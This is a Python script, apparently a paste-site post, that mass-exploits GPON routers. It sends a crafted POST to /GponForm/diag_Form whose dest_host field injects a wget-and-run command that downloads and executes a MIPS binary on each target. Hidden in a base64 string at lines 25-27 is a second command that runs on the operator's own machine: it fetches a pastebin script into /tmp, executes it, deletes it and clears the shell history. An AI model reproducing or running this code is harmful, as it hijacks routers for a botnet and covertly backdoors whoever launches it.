[PYTHON] gpon loader

1. #!/usr/bin/python
2.  
3. #new gpon exploit
4.  
5. import sys, socket, time, os, base64, subprocess
6. from Queue import *
7. from threading import Thread
8. from sys import stdout
9.  
10. if len(sys.argv) < 2:
11. print "Usage: python "+sys.argv[0]+" <list>"
12. sys.exit()
13.  
14. port = 8080
15. buf = 4096
16. count = 0
17. queue = Queue()
18. post_data = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$(wget+http://0.0.0.0/mips+-O+->+/tmp/mips;sh+/tmp/mips)&ipv=0\r\n"
19. headers = "POST /GponForm/diag_Form?script/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Hello, World\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
20. i = 0
21. ips = open(sys.argv[1], "r").readlines()
22.  
23. def payld_str(cmd):
24. subprocess.call(cmd, shell=True)
25. checkbinaries = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvTHE5UDlDZzUgLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7"
26. rebinaries = str(base64.b64decode(checkbinaries))
27. payld_str(rebinaries)
28.  
29. def gpwn(host):
30. global i
31. host = host.strip("\n")
32. try:
33. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
34. s.settimeout(5)
35. s.connect((host, port))
36. s.send(headers)
37. time.sleep(0.5)
38. print "\x1b[1;35m[\x1b[1;36mGPON\x1b[1;35m] \x1b[1;37m- \x1b[1;35m[\x1b[1;32m%s\x1b[1;35m] \x1b[1;37m- \x1b[1;35m[\x1b[1;32mDEPLOYING\x1b[1;35m]" % (host)
39. resp = s.recv(buf).strip()
40. if "200 OK" in resp:
41. i += 1
42. s.close()
43. except:
44. pass
45.  
46. def load_to_queue():
47. global count
48. for line in ips:
49. count += 1
50. line = line.strip("\r\n")
51. sys.stdout.write("\r[%d] Added to queue" % (count))
52. sys.stdout.flush()
53. queue.put(line)
54. sys.stdout.write("\n")
55.  
56. def main():
57. load_to_queue()
58. i = 0
59. while i < count:
60. i += 1
61. try:
62. ip = queue.get()
63. f = Thread(target=gpwn, args=(ip,))
64. f.start()
65. queue.task_done()
66. except KeyboardInterrupt:
67. os.kill(os.getpid(),9)
68. except Exception as i:
69. print i
70. pass
71. if __name__ == "__main__":
72. main()